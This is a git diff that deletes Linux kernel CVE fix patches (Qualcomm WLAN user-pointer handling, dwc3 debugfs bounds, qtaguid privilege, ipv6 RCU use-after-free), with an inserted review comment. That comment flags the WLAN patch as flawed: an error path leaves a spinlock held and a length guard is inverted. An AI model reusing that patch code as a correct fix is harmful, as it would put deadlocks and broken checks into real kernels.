pStaInfo[cnt].isUsed) { - - if(!IS_BROADCAST_MAC(pStaInfo[cnt].macAddrSTA.bytes)) { -- memcpy((void *)pmaclist, (void *)&(pStaInfo[cnt].macAddrSTA), 
sizeof(v_MACADDR_t)); -- pmaclist += sizeof(v_MACADDR_t); -+ if (copy_to_user((void *)wrqu->data.pointer + maclist_index, -+ (void *)&(pStaInfo[cnt].macAddrSTA), sizeof(v_MACADDR_t))) -+ { -+ hddLog(LOG1, "%s: failed to copy data to user buffer", __func__); -+ return -EFAULT; -+ } -+ maclist_index += sizeof(v_MACADDR_t); - len -= sizeof(v_MACADDR_t); - } - } -@@ -1440,12 +1446,16 @@ static iw_softap_getassoc_stamacaddr(struct net_device *dev, - } - spin_unlock_bh( &pHostapdAdapter->staInfo_lock ); - -- *pmaclist = '\0'; -- -+ if (copy_to_user((void *)wrqu->data.pointer + maclist_index, -+ (void *)&maclist_null, sizeof(maclist_null)) || -+ copy_to_user((void *)wrqu->data.pointer, -+ (void *)&wrqu->data.length, sizeof(wrqu->data.length))) -+ { -+ hddLog(LOG1, "%s: failed to copy data to user buffer", __func__); -+ return -EFAULT; -+ } - wrqu->data.length -= len; - -- *(unsigned long int *)(wrqu->data.pointer) = wrqu->data.length; -- - return 0; - } - -@@ -1494,20 +1504,35 @@ static iw_softap_ap_stats(struct net_device *dev, - int len = wrqu->data.length; - pstatbuf = wrqu->data.pointer; - -- WLANSAP_GetStatistics((WLAN_HDD_GET_CTX(pHostapdAdapter))->pvosContext, &statBuffer, (v_BOOL_t)wrqu->data.flags); -- -- len = scnprintf(pstatbuf, len, -- "RUF=%d RMF=%d RBF=%d " -- "RUB=%d RMB=%d RBB=%d " -- "TUF=%d TMF=%d TBF=%d " -- "TUB=%d TMB=%d TBB=%d", -- (int)statBuffer.rxUCFcnt, (int)statBuffer.rxMCFcnt, (int)statBuffer.rxBCFcnt, -- (int)statBuffer.rxUCBcnt, (int)statBuffer.rxMCBcnt, (int)statBuffer.rxBCBcnt, -- (int)statBuffer.txUCFcnt, (int)statBuffer.txMCFcnt, (int)statBuffer.txBCFcnt, -- (int)statBuffer.txUCBcnt, (int)statBuffer.txMCBcnt, (int)statBuffer.txBCBcnt -- ); -+ WLANSAP_GetStatistics((WLAN_HDD_GET_CTX(pHostapdAdapter))->pvosContext, -+ &statBuffer, (v_BOOL_t)wrqu->data.flags); - -+ pstatbuf = kmalloc(wrqu->data.length, GFP_KERNEL); -+ if(NULL == pstatbuf) { -+ hddLog(LOG1, "unable to allocate memory"); -+ return -ENOMEM; -+ } -+ len = scnprintf(pstatbuf, 
wrqu->data.length, -+ "RUF=%d RMF=%d RBF=%d " -+ "RUB=%d RMB=%d RBB=%d " -+ "TUF=%d TMF=%d TBF=%d " -+ "TUB=%d TMB=%d TBB=%d", -+ (int)statBuffer.rxUCFcnt, (int)statBuffer.rxMCFcnt, -+ (int)statBuffer.rxBCFcnt, (int)statBuffer.rxUCBcnt, -+ (int)statBuffer.rxMCBcnt, (int)statBuffer.rxBCBcnt, -+ (int)statBuffer.txUCFcnt, (int)statBuffer.txMCFcnt, -+ (int)statBuffer.txBCFcnt, (int)statBuffer.txUCBcnt, -+ (int)statBuffer.txMCBcnt, (int)statBuffer.txBCBcnt); -+ -+ if (len > wrqu->data.length || -+ copy_to_user((void *)wrqu->data.pointer, (void *)pstatbuf, len)) -+ { -+ hddLog(LOG1, "%s: failed to copy data to user buffer", __func__); -+ kfree(pstatbuf); -+ return -EFAULT; -+ } - wrqu->data.length -= len; -+ kfree(pstatbuf); - return 0; - } - -@@ -1870,8 +1895,15 @@ int iw_get_genie(struct net_device *dev, - status = WLANSap_getstationIE_information(pVosContext, - &length, - genIeBytes); -- wrqu->data.length = VOS_MIN((u_int16_t) length, DOT11F_IE_RSN_MAX_LEN); -- vos_mem_copy( wrqu->data.pointer, (v_VOID_t*)genIeBytes, wrqu->data.length); -+ length = VOS_MIN((u_int16_t) length, DOT11F_IE_RSN_MAX_LEN); -+ if (wrqu->data.length < length || -+ copy_to_user(wrqu->data.pointer, -+ (v_VOID_t*)genIeBytes, length)) -+ { -+ hddLog(LOG1, "%s: failed to copy data to user buffer", __func__); -+ return -EFAULT; -+ } -+ wrqu->data.length = length; - - hddLog(LOG1,FL(" RSN IE of %d bytes returned\n"), wrqu->data.length ); - -@@ -1885,18 +1917,30 @@ int iw_get_WPSPBCProbeReqIEs(struct net_device *dev, - union iwreq_data *wrqu, char *extra) - { - hdd_adapter_t *pHostapdAdapter = (netdev_priv(dev)); -- sQcSapreq_WPSPBCProbeReqIES_t *pWPSPBCProbeReqIEs; -+ sQcSapreq_WPSPBCProbeReqIES_t WPSPBCProbeReqIEs; - hdd_ap_ctx_t *pHddApCtx = WLAN_HDD_GET_AP_CTX_PTR(pHostapdAdapter); - ENTER(); -- -+ - hddLog(LOG1,FL("get_WPSPBCProbeReqIEs ioctl\n")); -- -- pWPSPBCProbeReqIEs = (sQcSapreq_WPSPBCProbeReqIES_t *)(wrqu->data.pointer); -- pWPSPBCProbeReqIEs->probeReqIELen = 
pHddApCtx->WPSPBCProbeReq.probeReqIELen; -- vos_mem_copy(pWPSPBCProbeReqIEs->probeReqIE, pHddApCtx->WPSPBCProbeReq.probeReqIE, pWPSPBCProbeReqIEs->probeReqIELen); -- vos_mem_copy(pWPSPBCProbeReqIEs->macaddr, pHddApCtx->WPSPBCProbeReq.peerMacAddr, sizeof(v_MACADDR_t)); -- wrqu->data.length = 12 + pWPSPBCProbeReqIEs->probeReqIELen; -- hddLog(LOG1, FL("Macaddress : "MAC_ADDRESS_STR"\n"), MAC_ADDR_ARRAY(pWPSPBCProbeReqIEs->macaddr)); -+ memset((void*)&WPSPBCProbeReqIEs, 0, sizeof(WPSPBCProbeReqIEs)); -+ -+ WPSPBCProbeReqIEs.probeReqIELen = pHddApCtx->WPSPBCProbeReq.probeReqIELen; -+ vos_mem_copy(&WPSPBCProbeReqIEs.probeReqIE, -+ pHddApCtx->WPSPBCProbeReq.probeReqIE, -+ WPSPBCProbeReqIEs.probeReqIELen); -+ vos_mem_copy(&WPSPBCProbeReqIEs.macaddr, -+ pHddApCtx->WPSPBCProbeReq.peerMacAddr, -+ sizeof(v_MACADDR_t)); -+ if (copy_to_user(wrqu->data.pointer, -+ (void *)&WPSPBCProbeReqIEs, -+ sizeof(WPSPBCProbeReqIEs))) -+ { -+ hddLog(LOG1, "%s: failed to copy data to user buffer", __func__); -+ return -EFAULT; -+ } -+ wrqu->data.length = 12 + WPSPBCProbeReqIEs.probeReqIELen; -+ hddLog(LOG1, FL("Macaddress : "MAC_ADDRESS_STR"\n"), -+ MAC_ADDR_ARRAY(WPSPBCProbeReqIEs.macaddr)); - up(&pHddApCtx->semWpsPBCOverlapInd); - EXIT(); - return 0; -@@ -2282,20 +2326,37 @@ static int iw_softap_setwpsie(struct net_device *dev, - v_CONTEXT_t pVosContext = (WLAN_HDD_GET_CTX(pHostapdAdapter))->pvosContext; - hdd_hostapd_state_t *pHostapdState; - eHalStatus halStatus= eHAL_STATUS_SUCCESS; -- u_int8_t *wps_genie = wrqu->data.pointer; -+ u_int8_t *wps_genie; -+ u_int8_t *fwps_genie; - u_int8_t *pos; - tpSap_WPSIE pSap_WPSIe; - u_int8_t WPSIeType; - u_int16_t length; - ENTER(); - -- if(!wrqu->data.length) -+ if(!wrqu->data.length || wrqu->data.length <= QCSAP_MAX_WSC_IE) - return 0; - -+ wps_genie = kmalloc(wrqu->data.length, GFP_KERNEL); -+ -+ if(NULL == wps_genie) { -+ hddLog(LOG1, "unable to allocate memory"); -+ return -ENOMEM; -+ } -+ fwps_genie = wps_genie; -+ if (copy_from_user((void 
*)wps_genie, -+ wrqu->data.pointer, wrqu->data.length)) -+ { -+ hddLog(LOG1, "%s: failed to copy data to user buffer", __func__); -+ kfree(fwps_genie); -+ return -EFAULT; -+ } -+ - pSap_WPSIe = vos_mem_malloc(sizeof(tSap_WPSIE)); - if (NULL == pSap_WPSIe) - { - hddLog(LOGE, "VOS unable to allocate memory\n"); -+ kfree(fwps_genie); - return -ENOMEM; - } - vos_mem_zero(pSap_WPSIe, sizeof(tSap_WPSIE)); -@@ -2312,6 +2373,7 @@ static int iw_softap_setwpsie(struct net_device *dev, - if (wps_genie[1] < 2 + 4) - { - vos_mem_free(pSap_WPSIe); -+ kfree(fwps_genie); - return -EINVAL; - } - else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0) -@@ -2385,6 +2447,7 @@ static int iw_softap_setwpsie(struct net_device *dev, - default: - hddLog (LOGW, "UNKNOWN TLV in WPS IE(%x)\n", (*pos<<8 | *(pos+1))); - vos_mem_free(pSap_WPSIe); -+ kfree(fwps_genie); - return -EINVAL; - } - } -@@ -2398,6 +2461,7 @@ static int iw_softap_setwpsie(struct net_device *dev, - default: - hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, wps_genie[0]); - vos_mem_free(pSap_WPSIe); -+ kfree(fwps_genie); - return 0; - } - } -@@ -2411,6 +2475,7 @@ static int iw_softap_setwpsie(struct net_device *dev, - if (wps_genie[1] < 2 + 4) - { - vos_mem_free(pSap_WPSIe); -+ kfree(fwps_genie); - return -EINVAL; - } - else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0) -@@ -2575,6 +2640,7 @@ static int iw_softap_setwpsie(struct net_device *dev, - } - - vos_mem_free(pSap_WPSIe); -+ kfree(fwps_genie); - EXIT(); - return halStatus; - } -@@ -2682,7 +2748,7 @@ static int iw_set_ap_genie(struct net_device *dev, - hdd_adapter_t *pHostapdAdapter = (netdev_priv(dev)); - v_CONTEXT_t pVosContext = (WLAN_HDD_GET_CTX(pHostapdAdapter))->pvosContext; - eHalStatus halStatus= eHAL_STATUS_SUCCESS; -- u_int8_t *genie = wrqu->data.pointer; -+ u_int8_t *genie = (u_int8_t *)extra; - - ENTER(); - -@@ -2691,7 +2757,7 @@ static int iw_set_ap_genie(struct net_device *dev, - EXIT(); - return 0; - } -- -+ - switch (genie[0]) - { - case 
DOT11F_EID_WPA: -@@ -2702,7 +2768,7 @@ static int iw_set_ap_genie(struct net_device *dev, - hdd_softap_Register_BC_STA(pHostapdAdapter, 1); - } - (WLAN_HDD_GET_AP_CTX_PTR(pHostapdAdapter))->uPrivacy = 1; -- halStatus = WLANSAP_Set_WPARSNIes(pVosContext, wrqu->data.pointer, wrqu->data.length); -+ halStatus = WLANSAP_Set_WPARSNIes(pVosContext, genie, wrqu->data.length); - break; - - default: -@@ -2768,6 +2834,7 @@ int iw_get_softap_linkspeed(struct net_device *dev, - hdd_adapter_t *pHostapdAdapter = (netdev_priv(dev)); - hdd_context_t *pHddCtx; - char *pLinkSpeed = (char*)extra; -+ char *pmacAddress; - v_U32_t link_speed; - unsigned short staId; - int len = sizeof(v_U32_t)+1; -@@ -2786,7 +2853,26 @@ int iw_get_softap_linkspeed(struct net_device *dev, - } - - hddLog(VOS_TRACE_LEVEL_INFO, "%s wrqu->data.length= %d\n", __func__, wrqu->data.length); -- status = hdd_string_to_hex ((char *)wrqu->data.pointer, wrqu->data.length, macAddress ); -+ if (wrqu->data.length != MAC_ADDRESS_STR_LEN) -+ { -+ hddLog(LOG1, "Invalid length"); -+ return -EINVAL; -+ } -+ pmacAddress = kmalloc(MAC_ADDRESS_STR_LEN, GFP_KERNEL); -+ if(NULL == pmacAddress) { -+ hddLog(LOG1, "unable to allocate memory"); -+ return -ENOMEM; -+ } -+ if (copy_from_user((void *)pmacAddress, -+ wrqu->data.pointer, wrqu->data.length)) -+ { -+ hddLog(LOG1, "%s: failed to copy data to user buffer", __func__); -+ kfree(pmacAddress); -+ return -EFAULT; -+ } -+ -+ status = hdd_string_to_hex (pmacAddress, wrqu->data.length, macAddress ); -+ kfree(pmacAddress); - - if (!VOS_IS_STATUS_SUCCESS(status )) - { --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3797/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-3797/qcacld-2.0/0001.patch deleted file mode 100644 index bff80ffa..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3797/qcacld-2.0/0001.patch +++ /dev/null 
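Review bot: In `iw_softap_getassoc_stamacaddr` (wlan_hdd_hostapd.c, the CVE-2016-3792 patch) the new `copy_to_user` calls sit between `spin_lock_bh(&pHostapdAdapter->staInfo_lock)` and `spin_unlock_bh`, and the added `return -EFAULT;` inside the loop leaves the function with the lock still held. At minimum that path needs `spin_unlock_bh(&pHostapdAdapter->staInfo_lock);` before the return. Because `copy_to_user` can fault and sleep, the station addresses are better gathered into a kernel buffer under the lock and copied out once after the unlock. The running `maclist_index` is also never compared with `wrqu->data.length` in the visible lines. Separately, the new guard in `iw_softap_setwpsie`, `wrqu->data.length <= QCSAP_MAX_WSC_IE`, returns 0 for every length up to the maximum and lets only larger ones reach `kmalloc`, which looks inverted (`>` is probably what was meant); the loop header and most of these function bodies lie outside the hunks.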
@@ -1,60 +0,0 @@
-From fdda9c0af64d6e5cdf006e2d8dd57e655821a962 Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda
-Date: Sun, 10 Apr 2016 00:35:17 -0700
-Subject: qcacld-2.0: Fix buffer overwrite problem in CCXPLMREQ
-
-Set the number of channels to minimum of input data and
-WNI_CFG_VALID_CHANNEL_LIST_LEN.
-
-Change-Id: Ib6fca483ac99cddfcd3b739ce62e86ecd498f1f5
-CRs-Fixed: 1001450
----
- CORE/HDD/src/wlan_hdd_main.c | 14 +++++++-------
- 1 file changed, 7 insertions(+), 7 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_main.c b/CORE/HDD/src/wlan_hdd_main.c
-index a6249e1..38452eb 100644
----- a/CORE/HDD/src/wlan_hdd_main.c
-+++ b/CORE/HDD/src/wlan_hdd_main.c
-@@ -3002,8 +3002,9 @@ static eHalStatus hdd_parse_plm_cmd(tANI_U8 *pValue, tSirPlmReq *pPlmRequest)
- if (content < 0)
- return eHAL_STATUS_FAILURE;
-
-+ content = VOS_MIN(content, WNI_CFG_VALID_CHANNEL_LIST_LEN);
- pPlmRequest->plmNumCh = content;
-- hddLog(VOS_TRACE_LEVEL_DEBUG, "numch %d", pPlmRequest->plmNumCh);
-+ hddLog(LOG1, FL("Numch: %d"), pPlmRequest->plmNumCh);
-
- /* Channel numbers */
- for (count = 0; count < pPlmRequest->plmNumCh; count++)
-@@ -3021,10 +3022,9 @@ static eHalStatus hdd_parse_plm_cmd(tANI_U8 *pValue, tSirPlmReq *pPlmRequest)
- if (1 != ret) return eHAL_STATUS_FAILURE;
-
- ret = kstrtos32(buf, 10, &content);
-- if ( ret < 0) return eHAL_STATUS_FAILURE;
--
-- if (content <= 0)
-- return eHAL_STATUS_FAILURE;
-+ if (ret < 0 || content <= 0 ||
-+ content > WNI_CFG_CURRENT_CHANNEL_STAMAX)
-+ return eHAL_STATUS_FAILURE;
-
- pPlmRequest->plmChList[count]= content;
- hddLog(VOS_TRACE_LEVEL_DEBUG, " ch- %d",
-@@ -6464,11 +6464,11 @@ static int hdd_driver_command(hdd_adapter_t *pAdapter,
- {
- tANI_U8 *value = command;
- eHalStatus status = eHAL_STATUS_SUCCESS;
-- tpSirPlmReq pPlmRequest = NULL;
-+ tpSirPlmReq pPlmRequest;
-
- pPlmRequest = vos_mem_malloc(sizeof(tSirPlmReq));
- if (NULL == pPlmRequest){
-- ret = -EINVAL;
-+ ret = -ENOMEM;
- goto exit;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3809/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3809/ANY/0001.patch
deleted file mode 100644
index c172fbd7..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3809/ANY/0001.patch
+++ /dev/null
@@ -1,13 +0,0 @@
-diff --git a/net/netfilter/xt_qtaguid.c b/net/netfilter/xt_qtaguid.c
-index c690e0f..9ce6228 100644
----- a/net/netfilter/xt_qtaguid.c
-+++ b/net/netfilter/xt_qtaguid.c
-@@ -2521,7 +2521,7 @@
- uid_t stat_uid = get_uid_from_tag(tag);
- struct proc_print_info *ppi = m->private;
- /* Detailed tags are not available to everybody */
-- if (get_atag_from_tag(tag) && !can_read_other_uid_stats(stat_uid)) {
-+ if (!can_read_other_uid_stats(stat_uid)) {
- CT_DEBUG("qtaguid: stats line: "
- "%s 0x%llx %u: insufficient priv "
- "from pid=%u tgid=%u uid=%u stats.gid=%u\n",
diff --git a/Patches/Linux_CVEs/CVE-2016-3809/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-3809/ANY/0001.patch.base64
deleted file mode 100644
index 7ea5620c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3809/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-3813/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-3813/3.10/0001.patch
deleted file mode 100644
index 7c2f848a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3813/3.10/0001.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 3c0add95808fdada98ba0ab465c0b4ba49e71d26 Mon Sep 17 00:00:00 2001
-From: Vijayavardhan Vennapusa
-Date: Thu, 5 May 2016 14:37:08 +0530
-Subject: USB: dwc3: debugfs: Add boundary check in dwc3_store_ep_num()
-
-User can pass arguments as part of write to requests and endpoint number
-will be calculated based on the arguments. There is a chance that driver
-can access ep structue that is not allocated due to invalid arguments
-passed by user. Hence fix the issue by having check and return error in
-case of invalid arguments.
-
-Change-Id: I060ea878b55ce0f9983b91c50e58718c8a2c2fa1
-Signed-off-by: Vijayavardhan Vennapusa
----
- drivers/usb/dwc3/debugfs.c | 12 ++++++++++--
- 1 file changed, 10 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/usb/dwc3/debugfs.c b/drivers/usb/dwc3/debugfs.c
-index 857b413..fc3f959 100644
----- a/drivers/usb/dwc3/debugfs.c
-+++ b/drivers/usb/dwc3/debugfs.c
-@@ -650,7 +650,7 @@ static ssize_t dwc3_store_ep_num(struct file *file, const char __user *ubuf,
- struct seq_file *s = file->private_data;
- struct dwc3 *dwc = s->private;
- char kbuf[10];
-- unsigned int num, dir;
-+ unsigned int num, dir, temp;
- unsigned long flags;
-
- memset(kbuf, 0, 10);
-@@ -661,8 +661,16 @@ static ssize_t dwc3_store_ep_num(struct file *file, const char __user *ubuf,
- if (sscanf(kbuf, "%u %u", &num, &dir) != 2)
- return -EINVAL;
-
-+ if (dir != 0 && dir != 1)
-+ return -EINVAL;
-+
-+ temp = (num << 1) + dir;
-+ if (temp >= (dwc->num_in_eps + dwc->num_out_eps) ||
-+ temp >= DWC3_ENDPOINTS_NUM)
-+ return -EINVAL;
-+
- spin_lock_irqsave(&dwc->lock, flags);
-- ep_num = (num << 1) + dir;
-+ ep_num = temp;
- spin_unlock_irqrestore(&dwc->lock, flags);
-
- return count;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3813/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-3813/3.18/0002.patch
deleted file mode 100644
index dc954494..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3813/3.18/0002.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From de81d402f12a3492400644024e694748d3514951 Mon Sep 17 00:00:00 2001
-From: Vijayavardhan Vennapusa
-Date: Thu, 5 May 2016 14:37:08 +0530
-Subject: USB: dwc3: debugfs: Add boundary check in dwc3_store_ep_num()
-
-User can pass arguments as part of write to requests and endpoint number
-will be calculated based on the arguments. There is a chance that driver
-can access ep structue that is not allocated due to invalid arguments
-passed by user. Hence fix the issue by having check and return error in
-case of invalid arguments.
-
-Change-Id: I060ea878b55ce0f9983b91c50e58718c8a2c2fa1
-Signed-off-by: Vijayavardhan Vennapusa
----
- drivers/usb/dwc3/debugfs.c | 12 ++++++++++--
- 1 file changed, 10 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/usb/dwc3/debugfs.c b/drivers/usb/dwc3/debugfs.c
-index 7a88671..c82647f 100644
----- a/drivers/usb/dwc3/debugfs.c
-+++ b/drivers/usb/dwc3/debugfs.c
-@@ -630,7 +630,7 @@ static ssize_t dwc3_store_ep_num(struct file *file, const char __user *ubuf,
- struct seq_file *s = file->private_data;
- struct dwc3 *dwc = s->private;
- char kbuf[10];
-- unsigned int num, dir;
-+ unsigned int num, dir, temp;
- unsigned long flags;
-
- memset(kbuf, 0, 10);
-@@ -641,8 +641,16 @@ static ssize_t dwc3_store_ep_num(struct file *file, const char __user *ubuf,
- if (sscanf(kbuf, "%u %u", &num, &dir) != 2)
- return -EINVAL;
-
-+ if (dir != 0 && dir != 1)
-+ return -EINVAL;
-+
-+ temp = (num << 1) + dir;
-+ if (temp >= (dwc->num_in_eps + dwc->num_out_eps) ||
-+ temp >= DWC3_ENDPOINTS_NUM)
-+ return -EINVAL;
-+
- spin_lock_irqsave(&dwc->lock, flags);
-- ep_num = (num << 1) + dir;
-+ ep_num = temp;
- spin_unlock_irqrestore(&dwc->lock, flags);
-
- return count;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3841/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3841/ANY/0001.patch
deleted file mode 100644
index 548bec76..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3841/ANY/0001.patch
+++ /dev/null
@@ -1,567 +0,0 @@
-From 45f6fad84cc305103b28d73482b344d7f5b76f39 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet
-Date: Sun, 29 Nov 2015 19:37:57 -0800
-Subject: ipv6: add complete rcu protection around np->opt
-
-This patch addresses multiple problems :
-
-UDP/RAW sendmsg() need to get a stable struct ipv6_txoptions
-while socket is not locked : Other threads can change np->opt
-concurrently. Dmitry posted a syzkaller
-(http://github.com/google/syzkaller) program desmonstrating
-use-after-free.
-
-Starting with TCP/DCCP lockless listeners, tcp_v6_syn_recv_sock()
-and dccp_v6_request_recv_sock() also need to use RCU protection
-to dereference np->opt once (before calling ipv6_dup_options())
-
-This patch adds full RCU protection to np->opt
-
-Reported-by: Dmitry Vyukov
-Signed-off-by: Eric Dumazet
-Acked-by: Hannes Frederic Sowa
-Signed-off-by: David S. Miller
----
- include/linux/ipv6.h | 2 +-
- include/net/ipv6.h | 21 ++++++++++++++++++++-
- net/dccp/ipv6.c | 33 +++++++++++++++++++++------------
- net/ipv6/af_inet6.c | 13 +++++++++----
- net/ipv6/datagram.c | 4 +++-
- net/ipv6/exthdrs.c | 3 ++-
- net/ipv6/inet6_connection_sock.c | 11 ++++++++---
- net/ipv6/ipv6_sockglue.c | 33 ++++++++++++++++++++++-----------
- net/ipv6/raw.c | 8 ++++++--
- net/ipv6/syncookies.c | 2 +-
- net/ipv6/tcp_ipv6.c | 28 +++++++++++++++++-----------
- net/ipv6/udp.c | 8 ++++++--
- net/l2tp/l2tp_ip6.c | 8 ++++++--
- 13 files changed, 122 insertions(+), 52 deletions(-)
-
-diff --git a/include/linux/ipv6.h b/include/linux/ipv6.h
-index 0ef2a97..402753b 100644
----- a/include/linux/ipv6.h
-+++ b/include/linux/ipv6.h
-@@ -227,7 +227,7 @@ struct ipv6_pinfo {
- struct ipv6_ac_socklist *ipv6_ac_list;
- struct ipv6_fl_socklist __rcu *ipv6_fl_list;
-
-- struct ipv6_txoptions *opt;
-+ struct ipv6_txoptions __rcu *opt;
- struct sk_buff *pktoptions;
- struct sk_buff *rxpmtu;
- struct inet6_cork cork;
-diff --git a/include/net/ipv6.h b/include/net/ipv6.h
-index ea5a13e..9a5c9f0 100644
----- a/include/net/ipv6.h
-+++ b/include/net/ipv6.h
-@@ -205,6 +205,7 @@ extern rwlock_t ip6_ra_lock;
- */
-
- struct ipv6_txoptions {
-+ atomic_t refcnt;
- /* Length of this structure */
- int tot_len;
-
-@@ -217,7 +218,7 @@ struct ipv6_txoptions {
- struct ipv6_opt_hdr *dst0opt;
- struct ipv6_rt_hdr *srcrt; /* Routing Header */
- struct ipv6_opt_hdr *dst1opt;
--
-+ struct rcu_head rcu;
- /* Option buffer, as read by IPV6_PKTOPTIONS, starts here. */
- };
-
-@@ -252,6 +253,24 @@ struct ipv6_fl_socklist {
- struct rcu_head rcu;
- };
-
-+static inline struct ipv6_txoptions *txopt_get(const struct ipv6_pinfo *np)
-+{
-+ struct ipv6_txoptions *opt;
-+
-+ rcu_read_lock();
-+ opt = rcu_dereference(np->opt);
-+ if (opt && !atomic_inc_not_zero(&opt->refcnt))
-+ opt = NULL;
-+ rcu_read_unlock();
-+ return opt;
-+}
-+
-+static inline void txopt_put(struct ipv6_txoptions *opt)
-+{
-+ if (opt && atomic_dec_and_test(&opt->refcnt))
-+ kfree_rcu(opt, rcu);
-+}
-+
- struct ip6_flowlabel *fl6_sock_lookup(struct sock *sk, __be32 label);
- struct ipv6_txoptions *fl6_merge_options(struct ipv6_txoptions *opt_space,
- struct ip6_flowlabel *fl,
-diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
-index db5fc24..e7e0b9b 100644
----- a/net/dccp/ipv6.c
-+++ b/net/dccp/ipv6.c
-@@ -202,7 +202,9 @@ static int dccp_v6_send_response(const struct sock *sk, struct request_sock *req
- security_req_classify_flow(req, flowi6_to_flowi(&fl6));
-
-
-- final_p = fl6_update_dst(&fl6, np->opt, &final);
-+ rcu_read_lock();
-+ final_p = fl6_update_dst(&fl6, rcu_dereference(np->opt), &final);
-+ rcu_read_unlock();
-
- dst = ip6_dst_lookup_flow(sk, &fl6, final_p);
- if (IS_ERR(dst)) {
-@@ -219,7 +221,10 @@ static int dccp_v6_send_response(const struct sock *sk, struct request_sock *req
- &ireq->ir_v6_loc_addr,
- &ireq->ir_v6_rmt_addr);
- fl6.daddr = ireq->ir_v6_rmt_addr;
-- err = ip6_xmit(sk, skb, &fl6, np->opt, np->tclass);
-+ rcu_read_lock();
-+ err = ip6_xmit(sk, skb, &fl6, rcu_dereference(np->opt),
-+ np->tclass);
-+ rcu_read_unlock();
- err = net_xmit_eval(err);
- }
-
-@@ -387,6 +392,7 @@ static struct sock *dccp_v6_request_recv_sock(const struct sock *sk,
- struct inet_request_sock *ireq = inet_rsk(req);
- struct ipv6_pinfo *newnp;
- const struct ipv6_pinfo *np = inet6_sk(sk);
-+ struct ipv6_txoptions *opt;
- struct inet_sock *newinet;
- struct dccp6_sock *newdp6;
- struct sock *newsk;
-@@ -488,13 +494,15 @@ static struct sock *dccp_v6_request_recv_sock(const struct sock *sk,
- * Yes, keeping reference count would be much more clever, but we make
- * one more one thing there: reattach optmem to newsk.
- */
-- if (np->opt != NULL)
-- newnp->opt = ipv6_dup_options(newsk, np->opt);
--
-+ opt = rcu_dereference(np->opt);
-+ if (opt) {
-+ opt = ipv6_dup_options(newsk, opt);
-+ RCU_INIT_POINTER(newnp->opt, opt);
-+ }
- inet_csk(newsk)->icsk_ext_hdr_len = 0;
-- if (newnp->opt != NULL)
-- inet_csk(newsk)->icsk_ext_hdr_len = (newnp->opt->opt_nflen +
-- newnp->opt->opt_flen);
-+ if (opt)
-+ inet_csk(newsk)->icsk_ext_hdr_len = opt->opt_nflen +
-+ opt->opt_flen;
-
- dccp_sync_mss(newsk, dst_mtu(dst));
-
-@@ -757,6 +765,7 @@ static int dccp_v6_connect(struct sock *sk, struct sockaddr *uaddr,
- struct ipv6_pinfo *np = inet6_sk(sk);
- struct dccp_sock *dp = dccp_sk(sk);
- struct in6_addr *saddr = NULL, *final_p, final;
-+ struct ipv6_txoptions *opt;
- struct flowi6 fl6;
- struct dst_entry *dst;
- int addr_type;
-@@ -856,7 +865,8 @@ static int dccp_v6_connect(struct sock *sk, struct sockaddr *uaddr,
- fl6.fl6_sport = inet->inet_sport;
- security_sk_classify_flow(sk, flowi6_to_flowi(&fl6));
-
-- final_p = fl6_update_dst(&fl6, np->opt, &final);
-+ opt = rcu_dereference_protected(np->opt, sock_owned_by_user(sk));
-+ final_p = fl6_update_dst(&fl6, opt, &final);
-
- dst = ip6_dst_lookup_flow(sk, &fl6, final_p);
- if (IS_ERR(dst)) {
-@@ -876,9 +886,8 @@ static int dccp_v6_connect(struct sock *sk, struct sockaddr *uaddr,
- __ip6_dst_store(sk, dst, NULL, NULL);
-
- icsk->icsk_ext_hdr_len = 0;
-- if (np->opt != NULL)
-- icsk->icsk_ext_hdr_len = (np->opt->opt_flen +
-- np->opt->opt_nflen);
-+ if (opt)
-+ icsk->icsk_ext_hdr_len = opt->opt_flen + opt->opt_nflen;
-
- inet->inet_dport = usin->sin6_port;
-
-diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c
-index 44bb66b..38d66dd 100644
----- a/net/ipv6/af_inet6.c
-+++ b/net/ipv6/af_inet6.c
-@@ -428,9 +428,11 @@ void inet6_destroy_sock(struct sock *sk)
-
- /* Free tx options */
-
-- opt = xchg(&np->opt, NULL);
-- if (opt)
-- sock_kfree_s(sk, opt, opt->tot_len);
-+ opt = xchg((__force struct ipv6_txoptions **)&np->opt, NULL);
-+ if (opt) {
-+ atomic_sub(opt->tot_len, &sk->sk_omem_alloc);
-+ txopt_put(opt);
-+ }
- }
- EXPORT_SYMBOL_GPL(inet6_destroy_sock);
-
-@@ -659,7 +661,10 @@ int inet6_sk_rebuild_header(struct sock *sk)
- fl6.fl6_sport = inet->inet_sport;
- security_sk_classify_flow(sk, flowi6_to_flowi(&fl6));
-
-- final_p = fl6_update_dst(&fl6, np->opt, &final);
-+ rcu_read_lock();
-+ final_p = fl6_update_dst(&fl6, rcu_dereference(np->opt),
-+ &final);
-+ rcu_read_unlock();
-
- dst = ip6_dst_lookup_flow(sk, &fl6, final_p);
